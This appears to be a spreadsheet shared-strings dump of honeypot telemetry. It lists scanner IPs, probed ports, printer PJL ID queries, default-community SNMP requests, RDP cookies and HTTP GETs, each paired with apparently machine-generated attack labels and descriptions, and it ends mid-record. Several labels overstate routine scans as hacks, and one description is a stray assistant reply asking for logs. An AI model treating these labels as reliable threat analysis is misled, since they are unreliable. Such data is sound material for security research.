    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;3389&amp;&amp;21&amp;&amp;110&amp;&amp;3306&amp;&amp;161&amp;&amp;143&amp;&amp;9100&amp;&amp;1433&amp;&amp;22890&amp;&amp;5900&amp;&amp;1080&amp;&amp;54292&amp;&amp;NA&amp;&amp;1521&amp;&amp;5432&amp;&amp;6667&amp;&amp;54889&amp;&amp;23&amp;&amp;59274&amp;&amp;50323&amp;&amp;52307&amp;&amp;389&amp;&amp;80&amp;&amp;6379&amp;&amp;56179&amp;&amp;53009&amp;&amp;63316&amp;&amp;57164</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits']}</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;NA&amp;&amp;stshash&amp;&amp;request&amp;&amp;GET&amp;&amp;command</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NmXnNq'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=yVhmufpPW'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=kLJcuV'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}</t>
  </si>
  <si>
    <t>::ffff:c6eb:1889</t>
  </si>
  <si>
    <t>A possible malicious activity is an attempt to extract printer information or gain unauthorized access to a device's configuration settings.
The attacker may be trying to exploit a vulnerability in the print job processing system.
This could potentially lead to further exploitation or data theft. &amp;&amp; This log indicates an attempt to retrieve printer information, which could be a reconnaissance activity by an attacker to gather knowledge about the system's configuration and potential vulnerabilities. The command is likely part of a larger attack sequence. It suggests someone trying to map out what services are available on the system. &amp;&amp; Possible printer exploitation attempt where an attacker sends a malicious print job command to gain unauthorized access or control of the device's settings and operations. The attack may be used for espionage, sabotage, or to create a network entry point. Malicious actors can use this technique to spread malware or steal sensitive information. &amp;&amp; The data suggests an attempt to retrieve printer configuration information, likely for malicious purposes such as exploiting vulnerabilities or stealing sensitive data. This activity appears to be a probing operation, attempting to gather information about the system's printer settings. The goal is probably to gain unauthorized access or exploit printer-specific vulnerabilities. &amp;&amp; Malicious actor attempting to enable TLS encryption for FTP connection, possibly to mask subsequent unauthorized access or data transfer. This could be a step towards compromising the system's security. Further analysis is needed to determine the full extent of the malicious activity. &amp;&amp; An attacker is attempting to use TLS encryption for FTP login, which could be an attempt to conceal malicious activity or evade detection. This may indicate a potential vulnerability exploitation or unauthorized access attempt. The user is trying to establish an encrypted connection for the authentication process.</t>
  </si>
  <si>
    <t>Invalid IMAP &amp;&amp; Printer Hack &amp;&amp; Brute Scripting &amp;&amp; Weak TLS &amp;&amp; SSL Attack</t>
  </si>
  <si>
    <t>cc996d9f95c8f24a3d8e4e71caeefa87</t>
  </si>
  <si>
    <t>117.205.115.3</t>
  </si>
  <si>
    <t>::ffff:75cd:7303</t>
  </si>
  <si>
    <t>e11eb873662326341384bb769cfa6527</t>
  </si>
  <si>
    <t>198.235.24.6</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_MYSQL_H25&amp;&amp;SMA-LAB_FTP_H5&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_RDP_H41&amp;&amp;SMA-LAB_SNMP_H8&amp;&amp;SMA-LAB_VNC_H2&amp;&amp;SMA-LAB_SOCKS5_H29&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_PJL_H24&amp;&amp;SMA-LAB_PJL_H30&amp;&amp;SMA-LAB_ORACLE_H10&amp;&amp;SMA-LAB_FTP_H31&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_SOCKS5_H25&amp;&amp;SMA-LAB_SOCKS5_H14&amp;&amp;SMA-LAB_MYSQL_H28&amp;&amp;SMA-LAB_PJL_H47&amp;&amp;SMA-LAB_PJL_H28&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_SOCKS5_H47&amp;&amp;SMA-LAB_SOCKS5_H40&amp;&amp;SMA-LAB_FTP_H27&amp;&amp;SMA-LAB_FTP_H10&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_RDP_H26&amp;&amp;SMA-LAB_LDAP_H46&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_PJL_H17&amp;&amp;SMA-LAB_SNMP_H3&amp;&amp;SMA-LAB_SNMP_H33&amp;&amp;SMA-LAB_POP3_H37&amp;&amp;SMA-LAB_SNMP_H47&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_SNMP_H6</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;3306&amp;&amp;21&amp;&amp;63705&amp;&amp;3389&amp;&amp;161&amp;&amp;5900&amp;&amp;1080&amp;&amp;143&amp;&amp;9100&amp;&amp;1521&amp;&amp;63968&amp;&amp;1433&amp;&amp;6379&amp;&amp;110&amp;&amp;389&amp;&amp;NA&amp;&amp;5432&amp;&amp;445&amp;&amp;54997</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;request&amp;&amp;stshash&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=TczuLLtAS'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=tDYRLW'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qrrcOk'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XStcsgkIT'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=MNARuq'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XIZosU'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ZWwFVmUCm'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=FMEUhk'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=xGDjvs'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.6,57756)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.6,57758)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.6,57770)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.6,59174)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.6,59184)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.6,59192)}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_VNC:NA}</t>
  </si>
  <si>
    <t>::ffff:c6eb:1806</t>
  </si>
  <si>
    <t>Unauthorized access to a network management system using a default community string "public" for version 0 of the protocol. This is a common initial step in a larger attack, allowing attackers to gain access and move laterally within the network. It indicates an attempt to exploit the SNMP service.</t>
  </si>
  <si>
    <t>SNMP Scan</t>
  </si>
  <si>
    <t>dd9931a9d4d30241f2db7ca4a581535d</t>
  </si>
  <si>
    <t>172.81.60.58</t>
  </si>
  <si>
    <t>unassigned.172-81-60-58.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_DNS_H11&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H41</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;53&amp;&amp;40296&amp;&amp;59278&amp;&amp;56001&amp;&amp;55666&amp;&amp;63546</t>
  </si>
  <si>
    <t>398019</t>
  </si>
  <si>
    <t>Dynu Systems Incorporated</t>
  </si>
  <si>
    <t>2021-04-01</t>
  </si>
  <si>
    <t>DYNU</t>
  </si>
  <si>
    <t>2023-01-12</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_VNC:NA}</t>
  </si>
  <si>
    <t>::ffff:ac51:3c3a</t>
  </si>
  <si>
    <t>3e94e37771ec2a4eef20c70862d7b96c</t>
  </si>
  <si>
    <t>172.81.62.75</t>
  </si>
  <si>
    <t>unassigned.172-81-62-75.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_DNS_H13&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H33</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;53&amp;&amp;17702&amp;&amp;53489&amp;&amp;63922&amp;&amp;60555&amp;&amp;54965&amp;&amp;53815&amp;&amp;60824&amp;&amp;63526</t>
  </si>
  <si>
    <t>::ffff:ac51:3e4b</t>
  </si>
  <si>
    <t>19dbc53d4b719b95c4c4cedd048fb893</t>
  </si>
  <si>
    <t>125.24.86.67</t>
  </si>
  <si>
    <t>13.8941</t>
  </si>
  <si>
    <t>100.584</t>
  </si>
  <si>
    <t>TOT-NET</t>
  </si>
  <si>
    <t>::ffff:7d18:5643</t>
  </si>
  <si>
    <t>e9d7549cc212c54739a82cc541f86399</t>
  </si>
  <si>
    <t>172.81.62.82</t>
  </si>
  <si>
    <t>NA&amp;&amp;unassigned.172-81-62-82.spryt.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_VNC_H8</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;59025&amp;&amp;51266&amp;&amp;63808&amp;&amp;51912&amp;&amp;55341&amp;&amp;62642&amp;&amp;54001&amp;&amp;63457&amp;&amp;53463&amp;&amp;59129&amp;&amp;61627&amp;&amp;58099&amp;&amp;64354</t>
  </si>
  <si>
    <t>::ffff:ac51:3e52</t>
  </si>
  <si>
    <t>ff46425915f7bbfa860e4e1db2366265</t>
  </si>
  <si>
    <t>172.81.60.96</t>
  </si>
  <si>
    <t>NA&amp;&amp;unassigned.172-81-60-96.spryt.net</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H47</t>
  </si>
  <si>
    <t>5900&amp;&amp;49456&amp;&amp;55701&amp;&amp;64485&amp;&amp;55450&amp;&amp;58256&amp;&amp;63602&amp;&amp;51618&amp;&amp;58035</t>
  </si>
  <si>
    <t>::ffff:ac51:3c60</t>
  </si>
  <si>
    <t>bc64671460dcd852f24d6b8dce327b0b</t>
  </si>
  <si>
    <t>142.202.189.29</t>
  </si>
  <si>
    <t>NA&amp;&amp;unassigned.142-202-189-29.spryt.net</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H30</t>
  </si>
  <si>
    <t>5900&amp;&amp;60903&amp;&amp;53128&amp;&amp;53152&amp;&amp;57750&amp;&amp;50364</t>
  </si>
  <si>
    <t>::ffff:8eca:bd1d</t>
  </si>
  <si>
    <t>6d7d1c732b5776595677464cd624ad2a</t>
  </si>
  <si>
    <t>185.180.141.14</t>
  </si>
  <si>
    <t>zl-dala-us-gp1-wk121c.internet-census.org&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_POSTGRES_H13&amp;&amp;SMA-LAB_FTP_H8&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_IRC_H8&amp;&amp;SMA-LAB_DNS_H11&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_IRC_H10&amp;&amp;SMA-LAB_SNMP_H39&amp;&amp;SMA-LAB_POP3_H41&amp;&amp;SMA-LAB_POP3_H8&amp;&amp;SMA-LAB_ORACLE_H22&amp;&amp;SMA-LAB_SNMP_H17&amp;&amp;SMA-LAB_POP3_H14&amp;&amp;SMA-LAB_FTP_H4&amp;&amp;SMA-LAB_POSTGRES_H2&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_REDIS_H24&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_POP3_H11&amp;&amp;SMA-LAB_SNMP_H29&amp;&amp;SMA-LAB_SIP_H29&amp;&amp;SMA-LAB_IRC_H9&amp;&amp;SMA-LAB_NTP_H41&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_MYSQL_H3&amp;&amp;SMA-LAB_SNMP_H36&amp;&amp;SMA-LAB_TELNET_H34</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5432&amp;&amp;21&amp;&amp;6379&amp;&amp;6667&amp;&amp;53&amp;&amp;54273&amp;&amp;161&amp;&amp;110&amp;&amp;1521&amp;&amp;9100&amp;&amp;389&amp;&amp;NA&amp;&amp;23&amp;&amp;3306&amp;&amp;443&amp;&amp;25870&amp;&amp;5900&amp;&amp;29272</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;NA&amp;&amp;GET&amp;&amp;query</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': 'vmi1469081.contaboserver.net', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 144.126.148.5:9100_x000D_
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_VNC:NA}</t>
  </si>
  <si>
    <t>::ffff:b9b4:8d0e</t>
  </si>
  <si>
    <t>I need to see some log data to analyze. Can you provide it? I'll be happy to help identify the types of attacks based on the log entries!</t>
  </si>
  <si>
    <t>ee0f82d2692a3806c0d7a22f3dc9477e</t>
  </si>
  <si>
    <t>104.234.115.106</t>
  </si>
  <si>
    <t>NA&amp;&amp;crawler106.deepfield.net</t>
  </si>
  <si>
    <t>SMA-LAB_POSTGRES_H2&amp;&amp;SMA-LAB_FTP_HC1</t>
  </si>
  <si>
    <t>5432&amp;&amp;21&amp;&amp;3306&amp;&amp;21285&amp;&amp;161&amp;&amp;143&amp;&amp;1433&amp;&amp;443&amp;&amp;23&amp;&amp;9100&amp;&amp;445&amp;&amp;6667&amp;&amp;NA&amp;&amp;1521&amp;&amp;80&amp;&amp;1080</t>
  </si>
  <si>
    <t>WI</t>
  </si>
  <si>
    <t>Wisconsin</t>
  </si>
  <si>
    <t>Wood</t>
  </si>
  <si>
    <t>Port Edwards</t>
  </si>
  <si>
    <t>5267769</t>
  </si>
  <si>
    <t>54469</t>
  </si>
  <si>
    <t>44.3426</t>
  </si>
  <si>
    <t>-89.8597</t>
  </si>
  <si>
    <t>Internet Utilities NA LLC</t>
  </si>
  <si>
    <t>CyberOneData LLC</t>
  </si>
  <si>
    <t>connection&amp;&amp;login&amp;&amp;NA&amp;&amp;query&amp;&amp;GET</t>
  </si>
  <si>
    <t>{Data_POSTGRES:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;NA&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0 1.3.6.1.2.1.1.5.0', 'version': '0'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.0', 'version': '1'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.63.23', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.63.23', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.63.23', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.42.176', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.42.176', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.42.176', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '                    '}}&amp;&amp;{Data_SMB:Incoming connection (104.234.115.106,21436)}&amp;&amp;{Data_SMB:Incoming connection (104.234.115.106,33562)}&amp;&amp;{Data_SMB:Incoming connection (104.234.115.106,39888)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.116.162', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.116.162', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.116.162', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 